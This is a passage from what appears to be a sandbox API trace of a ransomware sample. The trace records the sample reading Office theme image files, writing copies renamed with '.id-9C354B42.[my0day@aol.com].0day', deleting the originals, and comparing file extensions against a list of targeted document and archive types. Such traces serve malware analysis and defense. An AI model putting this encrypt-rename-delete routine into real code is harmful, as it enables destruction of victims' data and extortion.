(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".jpg") returned 4 [0046.448] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".doc") returned 4 [0046.449] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString=".docx") returned 5 [0046.449] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.449] lstrlenW (lpString=".pdf") returned 4 [0046.449] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".xls") returned 4 [0046.449] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".xlsx") returned 5 [0046.449] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.449] lstrlenW (lpString=".ppt") returned 4 [0046.449] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".zip") returned 4 [0046.449] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".rar") returned 4 [0046.449] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".bz2") returned 4 [0046.449] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString=".7z") returned 3 [0046.449] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".dbf") returned 4 [0046.449] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".1cd") returned 4 [0046.449] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".jpg") returned 4 [0046.449] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.450] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.450] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.451] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1666) returned 1 [0046.451] CloseHandle (hObject=0x190) returned 1 [0046.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 0x20 [0046.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.451] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.451] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0046.453] GetLastError () returned 0x0 [0046.453] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x682, lpOverlapped=0x0) returned 1 [0046.454] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x690, lpOverlapped=0x0) returned 1 [0046.455] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.455] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.455] SetEndOfFile (hFile=0x208) returned 1 [0046.456] CloseHandle (hObject=0x208) returned 1 [0046.456] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.456] SetEndOfFile (hFile=0x190) returned 1 [0046.456] CloseHandle (hObject=0x190) returned 1 [0046.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.457] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 1 [0046.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.457] lstrlenW (lpString=".doc") returned 4 [0046.457] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.457] lstrlenW (lpString=".docx") returned 5 [0046.457] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.457] lstrlenW (lpString=".pdf") returned 4 [0046.457] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.457] lstrlenW (lpString=".xls") returned 4 [0046.457] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.457] lstrlenW (lpString=".xlsx") returned 5 [0046.457] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.457] lstrlenW (lpString=".ppt") returned 4 [0046.457] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.457] lstrlenW (lpString=".zip") returned 4 [0046.457] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.457] lstrlenW (lpString=".rar") returned 4 [0046.457] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.457] lstrlenW (lpString=".bz2") returned 4 [0046.457] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.457] lstrlenW (lpString=".7z") returned 3 [0046.457] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString=".dbf") returned 4 [0046.458] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString=".1cd") returned 4 [0046.458] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString=".jpg") returned 4 [0046.458] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString=".doc") returned 4 [0046.458] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.458] lstrlenW (lpString=".docx") returned 5 [0046.458] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.458] lstrlenW (lpString=".pdf") returned 4 [0046.458] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.458] lstrlenW (lpString=".xls") returned 4 [0046.458] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.458] lstrlenW (lpString=".xlsx") returned 5 [0046.458] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.458] lstrlenW (lpString=".ppt") returned 4 [0046.458] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString=".zip") returned 4 [0046.458] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.458] lstrlenW (lpString=".rar") returned 4 [0046.458] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.458] lstrlenW (lpString=".bz2") returned 4 [0046.458] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.458] lstrlenW (lpString=".7z") returned 3 [0046.458] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.458] lstrlenW (lpString=".dbf") returned 4 [0046.459] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.459] lstrlenW (lpString=".1cd") returned 4 [0046.459] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0046.459] lstrlenW (lpString=".jpg") returned 4 [0046.459] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.459] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.459] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.459] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=19563) returned 1 [0046.459] CloseHandle (hObject=0x190) returned 1 [0046.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 0x20 [0046.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.460] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.460] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0046.460] GetLastError () returned 0x0 [0046.460] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x4c6b, lpOverlapped=0x0) returned 1 [0046.462] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4c70, lpOverlapped=0x0) returned 1 [0046.463] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.463] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.463] SetEndOfFile (hFile=0x208) returned 1 [0046.463] CloseHandle (hObject=0x208) returned 1 [0046.463] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.463] SetEndOfFile (hFile=0x190) returned 1 [0046.464] CloseHandle (hObject=0x190) returned 1 [0046.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.464] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1 [0046.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString=".doc") returned 4 [0046.465] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.465] lstrlenW (lpString=".docx") returned 5 [0046.465] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.465] lstrlenW (lpString=".pdf") returned 4 [0046.465] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.465] lstrlenW (lpString=".xls") returned 4 [0046.465] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.465] lstrlenW (lpString=".xlsx") returned 5 [0046.465] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.465] lstrlenW (lpString=".ppt") returned 4 [0046.465] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString=".zip") returned 4 [0046.465] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.465] lstrlenW (lpString=".rar") returned 4 [0046.465] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.465] lstrlenW (lpString=".bz2") returned 4 [0046.465] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.465] lstrlenW (lpString=".7z") returned 3 [0046.465] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString=".dbf") returned 4 [0046.465] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString=".1cd") returned 4 [0046.465] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString=".jpg") returned 4 [0046.465] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.465] lstrlenW (lpString=".doc") returned 4 [0046.466] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.466] lstrlenW (lpString=".docx") returned 5 [0046.466] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.466] lstrlenW (lpString=".pdf") returned 4 [0046.466] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.466] lstrlenW (lpString=".xls") returned 4 [0046.466] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.466] lstrlenW (lpString=".xlsx") returned 5 [0046.466] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.466] lstrlenW (lpString=".ppt") returned 4 [0046.466] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.466] lstrlenW (lpString=".zip") returned 4 [0046.466] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.466] lstrlenW (lpString=".rar") returned 4 [0046.466] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.466] lstrlenW (lpString=".bz2") returned 4 [0046.466] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.466] lstrlenW (lpString=".7z") returned 3 [0046.466] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.466] lstrlenW (lpString=".dbf") returned 4 [0046.466] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.466] lstrlenW (lpString=".1cd") returned 4 [0046.466] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0046.466] lstrlenW (lpString=".jpg") returned 4 [0046.466] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.467] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.467] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.467] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1423) returned 1 [0046.467] CloseHandle (hObject=0x190) returned 1 [0046.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 0x20 [0046.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.467] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.467] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.469] GetLastError () returned 0x0 [0046.469] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x58f, lpOverlapped=0x0) returned 1 [0046.471] WriteFile (in: hFile=0x174, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x590, lpOverlapped=0x0) returned 1 [0046.471] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.472] WriteFile (in: hFile=0x174, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.472] SetEndOfFile (hFile=0x174) returned 1 [0046.472] CloseHandle (hObject=0x174) returned 1 [0046.472] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.472] SetEndOfFile (hFile=0x190) returned 1 [0046.473] CloseHandle (hObject=0x190) returned 1 [0046.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.473] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 1 [0046.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.473] lstrlenW (lpString=".doc") returned 4 [0046.473] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.473] lstrlenW (lpString=".docx") returned 5 [0046.473] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.473] lstrlenW (lpString=".pdf") returned 4 [0046.473] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.473] lstrlenW (lpString=".xls") returned 4 [0046.473] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.473] lstrlenW (lpString=".xlsx") returned 5 [0046.473] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.473] lstrlenW (lpString=".ppt") returned 4 [0046.474] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.474] lstrlenW (lpString=".zip") returned 4 [0046.474] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString=".rar") returned 4 [0046.474] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString=".bz2") returned 4 [0046.474] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.474] lstrlenW (lpString=".7z") returned 3 [0046.474] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.474] lstrlenW (lpString=".dbf") returned 4 [0046.474] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.474] lstrlenW (lpString=".1cd") returned 4 [0046.474] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.474] lstrlenW (lpString=".jpg") returned 4 